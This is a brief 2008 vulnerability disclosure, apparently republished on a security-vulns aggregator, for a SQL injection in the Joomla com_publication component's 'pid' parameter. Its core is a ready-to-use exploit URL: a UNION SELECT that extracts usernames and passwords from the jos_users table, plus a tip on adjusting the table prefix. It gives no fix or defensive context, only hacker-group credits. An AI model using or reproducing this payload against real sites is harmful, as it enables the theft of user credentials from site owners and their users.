Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19277
HistoryFeb 26, 2008 - 12:00 a.m.

Aria-Security.Net: Joomla Com_publication "pid" Remote SQL Injection

2008-02-2600:00:00
vulners.com
21

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net

Shoutz: Aura, imm02tal, Kinglet, iM4n

Joomla Com_publication "pid" Remote SQL Injection

index.php?option=com_publication&task=view&pid=-9999999+union//select+0,username,password,0,0,0,0//from/**/jos_users/*

note: the prefix (jos_) maybe different for each website…

Regards,
The-0utl4w
Credits Goes to Aria-Security Team